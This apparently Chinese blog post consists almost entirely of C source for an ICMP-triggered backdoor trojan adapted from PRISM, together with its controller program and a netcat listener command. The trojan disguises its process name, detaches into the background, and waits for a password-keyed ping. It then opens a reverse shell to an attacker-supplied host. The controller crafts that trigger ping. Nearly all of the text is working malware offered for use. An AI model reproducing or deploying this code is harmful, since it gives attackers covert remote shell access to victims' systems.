版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
目录
端口绑定命令: nc -lvp 6666
木马:
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#include "signal.h"
#include "arpa/inet.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "unistd.h"
#include "netinet/in.h"
#include "netinet/ip.h"
#include "netinet/ip_icmp.h"
#include "netinet/in_systm.h"
#include "netdb.h"
#include "setjmp.h"
#include "errno.h"
#include <sys/time.h>
#include "stdarg.h"
#include "ctype.h"
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#ifdef STATIC
#define TEVERSE_HOST "10.0.0.1"
#define REVERSE_PORT 19832
#define RESPAWN_DELAY 15
#else
#define ICMP_PACKET_SIZE 1024
#define ICMP_KEY "p4ssw0rd"
#endif
#define VERSION "0.5"
#define MOTD "PRISM v"VERSION" started\n\n# "
#define SHELL "/bin/sh"
#define PROCESS_NAME "udevdaaa"
void icmp_listen(void);
void start_reverse_shell(char * bd_ip,unsigned short int bd_port);
int main(int argc,char * argv[])
{
// signal(SIGCLD,SIG_IGN);
// chdir("/");
// if((argc == 2)&&(argv[1][0]=='I')&&(argv[1][1]=='n')&&(argv[1][2]=='f')&&(argv[1][3]=='0'))
// {
// fprintf(stdout, "Version:\t\t%s\n", VERSION);
// #ifdef STATIC
// fprintf(stdout, "Mode:\t\t\tstatic\n"
// "Host:\t\t\t%s\n"
// "Port:\t\t\t%d\n"
// "Respawn Delay:\t\t%d sec\n"
// ,TEVERSE_HOST,REVERSE_PORT,RESPAWN_DELAY);
// #else
// fprintf(stdout,"Mode:\t\t\ticmp\n"
// "Key:\t\t\t%socket\n"
// ,ICMP_KEY);
// #endif
// #ifndef NORENAME
// fprintf(stdout,"Process name:\t\t%s\n",PROCESS_NAME);
// #endif
// fprintf(stdout, "Shell:\t\t\t%s\n",SHELL);
// #ifdef DETACH
// fprintf(stdout, "Detach:\t\tYes\n");
// #else
// fprintf(stdout, "Detach:\t\tNo\n");
// #endif
// #ifdef IPTABLES
// fprintf(stdout, "Flush Iptables:\tYes\n");
// #else
// fprintf(stdout, "Flush Iptables:\tNo\n");
// #endif
// exit(EXIT_SUCCESS);
// }
//#ifndef NORENAME
int i;
strncpy(argv[0],PROCESS_NAME,strlen(argv[0]));
for (int i = 1; i < argc; ++i)
memset(argv[i],' ',strlen(argv[i]));
//#endif
//#ifdef DETACH
if(fork()!=0)
exit(EXIT_SUCCESS);
//#endif
//#ifdef STATIC
// while(1){
// if(fork()==0){
// start_reverse_shell(TEVERSE_HOST,REVERSE_PORT);
// exit(EXIT_SUCCESS);
// }
// sleep(RESPAWN_DELAY);
// }
//#else
if(getgid()!=0){
fprintf(stdout, "I`m noot root: :(\n");
exit(EXIT_FAILURE);
}
icmp_listen();
//#endif
return EXIT_SUCCESS;
}
void icmp_listen(void)
{
int sockfd,
n,
icmp_key_size;
char buf[ICMP_PACKET_SIZE+1];
struct icmp * icmp;
struct ip*ip;
icmp_key_size = strlen(ICMP_KEY);
sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_ICMP);
while(1){
bzero(buf,ICMP_PACKET_SIZE+1);
n = recv(sockfd,buf,ICMP_PACKET_SIZE,0);
printf("icmp come...\n");
if(n>0){
ip = (struct ip *)buf;
icmp = (struct icmp *)(ip + 1);
printf("jieshouchangdi:%d\n",n);
printf("neirong:%s\n",icmp->icmp_data);
if((icmp->icmp_type == ICMP_ECHO)&&(memcmp(icmp->icmp_data,ICMP_KEY,icmp_key_size)==0))
{
char bd_ip[16];
int bd_port;
bd_port = 0;
bzero(bd_ip,sizeof(bd_ip));
printf("yazhengtongguo\n");
sscanf((char *)(icmp->icmp_data +icmp_key_size +1),"%15s %d",bd_ip,&bd_port);
if((bd_port<=0)||(strlen(bd_ip)<7))
continue;
if(fork()==0){
start_reverse_shell(bd_ip,bd_port);
exit(EXIT_SUCCESS);
}
}
}
}
}
void start_reverse_shell(char * bd_ip,unsigned short int bd_port)
{
int sd;
struct sockaddr_in serv_addr;
struct hostent * server;
sd= socket(AF_INET,SOCK_STREAM,0);
if(sd<0)
return;
server = gethostbyname(bd_ip);
if(server == NULL)
return;
bzero((char *)&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr,(char *)&serv_addr.sin_addr.s_addr,server->h_length);
serv_addr.sin_port = htons(bd_port);
if(connect(sd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))<0)
return;
write(sd,MOTD,strlen(MOTD));
dup2(sd,0);//句柄重定向
dup2(sd,1);
dup2(sd,2);
execl(SHELL,SHELL,(char *)0);//启动shell
close(sd);
}
控制台程序
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#include "signal.h"
#include "arpa/inet.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "unistd.h"
#include "netinet/in.h"
#include "netinet/ip.h"
#include "netinet/ip_icmp.h"
#include "netdb.h"
#include "setjmp.h"
#include "errno.h"
#include <sys/time.h>
#define PACKET_SIZE 4096
#define MAX_WAIT_TIME 5
#define MAX_NO_PACKETS 1
#define DATA_LEN 56
#define DATABUF "p4ssw0rd 127.000.000.001 6666"
char sendpacket[PACKET_SIZE];
char recvpacket[PACKET_SIZE];
int nsend =0,nreceived = 0;
struct timeval tvrecv;
struct sockaddr_in from;
void statistics(int signo);
unsigned short cal_chksum(unsigned short *addr,int len);
int pack (int pack_no,int pid);
void send_packet(int sockfd,int pid,struct sockaddr_in dest_addr);
void recv_packet(int sockfd,int pid);
int unpack(char * buf,int len,int pid);
void tv_sub(struct timeval * out,struct timeval *in);
void statistics(int signo)
{
printf("\n-----------------------------PING statistics--------------------------\n");
printf("%d packets transmitted,%d received,%d lost\n",nsend,nreceived,(nsend-nreceived));
exit(1);
}
unsigned short cal_chksum(unsigned short * addr,int len)
{
int nleft = len;
int sum = 0;
unsigned short * w = addr;
unsigned short answer = 0;
while(nleft > 1)
{
sum+=*w++;
nleft-=2;
}
if(nleft == 1)
{
*(unsigned char *)(&answer)= *(unsigned char *)w;
sum+=answer;
}
sum = (sum>>16)+(sum&0xffff);
sum+=(sum>>16);
answer = ~sum;
return answer;
}
int pack(int pack_no,int pid)
{
int i,packsize;
struct icmp * icmp;
struct timeval * tval;
char * data = "p4ssw0rd 127.000.000.001 6666";
icmp=(struct icmp *)sendpacket;
icmp->icmp_type = ICMP_ECHO; //类型
icmp->icmp_code = 0; //代码
icmp->icmp_cksum = 0; //校验和
icmp->icmp_seq = pack_no; //序号,第几个包
icmp->icmp_id = pid; //进程号,因为icmp不绑定端口 所以需要制定进程
packsize = sizeof(DATABUF)+DATA_LEN; //56指icmp头的大小 8指的数据区大小
char * cdata = (char *)icmp->icmp_data;
//cdata = (char *)malloc(sizeof(DATABUF));
//memset(cdata,'\0',sizeof(cdata));
strncpy(cdata,DATABUF,sizeof(DATABUF));
//tval = (struct timeval *)icmp->icmp_data;
// gettimeofday(tval,NULL);
icmp->icmp_cksum = cal_chksum((unsigned short *)icmp,packsize);//计算校验和
return packsize;
}
void send_packet(int sockfd,int pid,struct sockaddr_in dest_addr)
{
int packetsize;
while(nsend<MAX_NO_PACKETS)
{
nsend++;
packetsize = pack(nsend,pid);
if(sendto(sockfd,sendpacket,packetsize,0,(struct sockaddr *)&dest_addr,sizeof(dest_addr))==-1)
{
perror("sendto error");
continue;
}
sleep(1);
}
}
void recv_packet(int sockfd,int pid)
{
int n,fromlen;
extern int errno;
signal(SIGALRM,statistics);
fromlen = sizeof(from);
while(nreceived<nsend)
{
alarm(MAX_WAIT_TIME);
if((n = recvfrom(sockfd,recvpacket,sizeof(recvpacket),0,(struct sockaddr *)&from,&fromlen))==-1)
{
if(errno==EINTR)continue;
perror("recvfrom error");
continue;
}
gettimeofday(&tvrecv,NULL);
if(unpack(recvpacket,n,pid)==-1)
continue;
nreceived++;
}
}
int unpack(char * buf,int len,int pid)
{
int i,iphdrlen;
struct ip *ip;
struct icmp *icmp;
struct timeval * tvsend;
double rtt;
ip = (struct ip *)buf;
iphdrlen = ip->ip_hl<<2;
icmp = (struct icmp *)(buf + iphdrlen);
len -= iphdrlen;
if(len<8)
{
printf("ICMP packets `s h_length is less than 8\n");
return -1;
}
if((icmp->icmp_type==ICMP_ECHOREPLY)&&(icmp->icmp_id == pid))
{
char data[1024];
memset(data,'\0',1024);
strcpy(data,icmp->icmp_data);
printf("printfdata: %s\n",data);
tvsend = (struct timeval *)icmp->icmp_data;
//tv_sub(&tvrecv,tvsend);
rtt = sizeof(icmp->icmp_data);//tvrecv.tv_sec*1000+tvrecv.tv_usec/1000;
printf("%d byte from %s: icmp_seq=%d ttl=%d rtt=%.3f ms\n",len,inet_ntoa(from.sin_addr),nreceived,(len-sizeof(icmp->icmp_data)),rtt);
}
else
return -1;
}
void tv_sub(struct timeval*out ,struct timeval *in)
{
if((out->tv_usec-=in->tv_usec)<0)
{
--out->tv_sec;
out->tv_usec+=1000000;
}
out->tv_sec-=in->tv_sec;
}
int main(int argc, char const *argv[])
{
int sockfd;
struct sockaddr_in dest_addr;
pid_t pid;
struct hostent * host;
struct protoent * protocol;
unsigned long inaddr = 0l;
int waittime = MAX_WAIT_TIME;
int size = 50*1024;
if(argc<2)
{
printf("usage:%s hostname/IP address\n",argv[0]);
exit(1);
}
//获取icmp协议名字
if((protocol = getprotobyname("icmp"))==NULL)
{
perror("getprotobyname");
exit(1);
}
if((sockfd=socket(AF_INET,SOCK_RAW,protocol->p_proto))<0)
{
perror("socket error");
exit(1);
}
setuid(getuid());
//改变接受buf
setsockopt(sockfd,SOL_SOCKET,SO_RCVBUF,&size,sizeof(size));
bzero(&dest_addr,sizeof(dest_addr));
dest_addr.sin_family = AF_INET;
//用gethostbyname 获得主机ip
if (inaddr=inet_addr(argv[1])==INADDR_NONE)
{
if((host=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname");
exit(1);
}
memcpy((char *)&(dest_addr.sin_addr),host->h_addr,host->h_length);
}
else
memcpy((char *)&(dest_addr.sin_addr),(char *)&inaddr,sizeof(inaddr));
printf("PING %s(%s): %d bytes data in ICMP packets.\n",argv[1],inet_ntoa(dest_addr.sin_addr),MAX_NO_PACKETS);
pid = getpid();
send_packet(sockfd,pid,dest_addr);
recv_packet(sockfd,pid);
statistics(SIGALRM);
close(sockfd);
return 0;
}